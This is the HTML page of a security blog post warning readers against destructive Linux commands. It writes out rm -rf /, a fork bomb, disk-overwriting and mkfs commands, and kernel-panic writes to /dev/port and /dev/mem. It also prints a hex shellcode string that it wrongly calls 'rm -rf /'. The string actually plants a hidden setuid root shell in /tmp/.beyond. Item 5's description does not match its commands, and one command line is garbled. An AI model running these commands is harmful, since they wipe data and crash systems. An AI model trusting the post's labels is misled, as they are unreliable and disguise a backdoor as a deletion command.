<!DOCTYPE HTML>
<!--
	Iridium by TEMPLATED
    templated.co @templatedco
    Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
-->
<html>
	<head>
		<title>NutCrackers Security</title>
		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
		<meta name="description" content="" />
		<meta name="keywords" content="" />
		<link href='http://fonts.googleapis.com/css?family=Arimo:400,700' rel='stylesheet' type='text/css'>
		<!--[if lte IE 8]><script src="js/html5shiv.js"></script><![endif]-->

			<link rel="stylesheet" href="css/skel-noscript.css" />
			<link rel="stylesheet" href="css/posts.css" />
			<link rel="stylesheet" href="css/style-desktop.css" />
		<!--[if lte IE 8]><link rel="stylesheet" href="css/ie/v8.css" /><![endif]-->
		<!--[if lte IE 9]><link rel="stylesheet" href="css/ie/v9.css" /><![endif]-->
		<!--<link rel="stylesheet" href="styles/ocean.css">-->
		<link rel="stylesheet" href="styles/srcery.css">
		<script src="highlight.pack.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<style>

table, th, td {
  border: 2px solid white;
  border-collapse: collapse;
}
</style>
	</head>
	<body class="homepage">

		<!-- Header -->
		<div>
			<div class="container">

				<!-- Logo -->
				<div>
					<ul class="default">
						<li><a href="index.html">Home</a></li>
						<li><a href="blog.html">Blog</a></li>
						<li><a href="archive.html">Archive</a></li>
					</ul>
				</div>

				<!-- Nav -->
			</div>
		</div>

		<!-- Main -->
		<div id="main">
			<div class="container">
				<div class="row">

					<!-- Content -->
					<div id="content" class="8u skel-cell-important">
						<section>
							<header>

										 <span class="byline"><a href="Ubuntu.html"><b>The Linux commands you should NEVER use</a></b></span>
											<img src="imagini/12.jpg"  alt="" style="height:275px;width:580px;"/>
<p>Hello guys,today we will talk about some commands that should never be used on linux distributions as they can cause many problems for you, let's see some of them :</p>
<p style="color:red">CAUTION: never use these commands:</p>
<p>1) This  command clears everything in the system, absolutely everything.</p>
<p style="color:yellow">rm -rf /</p>
<p>2) This code is the hex for rm -rf /.</p>
<p style="color:lawngreen">char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"</p>
<p style="color:lawngreen">"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"</p>
<p style="color:lawngreen">"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"</p>
<p style="color:lawngreen">"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"</p>
<p style="color:lawngreen">"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"</p>
<p style="color:lawngreen">"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"</p>
<p style="color:lawngreen">"\x6e\x2f\x73\x68\x00\x2d\x63\x00"</p>
<p style="color:lawngreen">"cp -p /bin/sh /tmp/.beyond; chmod 4755</p>
<p style="color:lawngreen">/tmp/.beyond;";</p>
<p>3) BASH FORK BOMB
Since we are on the topic of odd-looking code, consider this line:</p>
<p style="color:#62bcfa">:(){ :|: & };: </p>
<p>4) OVERWRITING THE HARD DRIVE WITH GARBAGE</p>
<p>But for just making a royal mess of your storage, it's hard to beat running:</p>
<p style="color:#62bcfa">Any command > /dev/hda</p>
<p>When I say "any command," I mean any command with output. For example:</p>
<p style="color:#62bcfa">ls -la > /dev/hda</p>
<p>Pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic—or turn it into a career-limiting crisis.</p>
<p>5) This command is called "Wipe that drive!" and writes data to a storage drive. The dd command pulls data from the special file that emits an infinite number of zeros and writes those zeros across the HDD / SSD.</p>
<p style="color:#bd1ce7">mv / /dev/null</p>
<p style="color:#bd1ce7">>mv ` /dev/null</p>
<p>6) FORMATTING THE WRONG DRIVE</p>
<p>Sometimes you must format a drive with a command like:</p>
<p style="color:#01ff85">mkfs.ext3 /dev/hda</p>
<p>This command also forms the entire HDD / SSD. Be very careful when you format a partition from the command line.</p>
<p>7) Kernel panics.Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself.</p>
<p style="color:#e7c01c">dd if=/dev/random of=/dev/port</p>
<p style="color:#e7c01c"> echo 1 > /proc/sys/kernel/panic</p>
<p style="color:#e7c01c">cat /dev/port</p>
<p style="color:#e7c01c">cat /dev/zero > /dev/mem</p>
<p style="color:red">You still need to be very careful about the scripts you download. It is best not to download if you do not know what that script does.</p>



						</section>
					</div>

					<!-- Sidebar -->
					<div id="sidebar" class="4u">
						<section>
							<header>
								<h2>Blog posts</h2>
							</header>
							<ul class="style">
								<li>
									<p class="posted">July 30, 2021 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="selenium.html">Tips and tricks: Selenium LFI to RCE</a></p>
									<p class="posted">February 6, 2021 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Transfer.html">File Transfer In Red Team/Penetration Testing</a></p>
									<p class="posted">January 15, 2020 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="PE-file.html">PE Portable Executable File Format</a></p>
									<p class="posted">November 14, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="crack.html">Cracking The PassFab RAR Software</a></p>
									<p class="posted">March 3, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Forensics.html">Volatility: Extract Password From RAM</a></p>
									<p class="posted">February 28, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows7.html">Windows Exploit Development Part VII</a></p>
									<p class="posted">February 16, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows6.html">Windows Exploit Development Part VI</a></p>
									<p class="posted">February 16, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows5.html">Windows Exploit Development Part V</a></p>
									<p class="posted">January 22, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows4.html">Windows Exploit Development Part IV</a></p>
									<p class="posted">January 16, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows3.html">Windows Exploit Development Part III</a></p>
									<p class="posted">January 16, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Windows2.html">Windows Exploit Development Part II</a></p>
									<p class="posted">January 1, 2019 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="WED.html">Windows Exploit Development Part I</a></p>
									<p class="posted">December 11, 2018 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Shellcode1.html">How to create your shellcode part II</a></p>
									<p class="posted">January 9, 2018 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Shellcode.html">How to create your own shellcode part I</a></p>
									<p class="posted">January 4, 2018 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Ubuntu.html">The Linux Commands you should NEVER use</a></p>
									<p class="posted">January 3, 2018 </p>
									<p class="text" style="bottom:10px; position: relative"><a href="Nmap.html">Nmap Firewall Scan</a></p>
								</li>
							</ul>
						</section>
					</div>
				</div>
			</div>
		</div>

		<!-- Footer -->

		<!-- Copyright -->
		<div id="copyright">
			<div class="container">
					Copyright &copy 2021 T3jv1l. All Rights Reserved. Created and designed by Mr.Leritaite.
			</div>
		</div>

	</body>
</html>
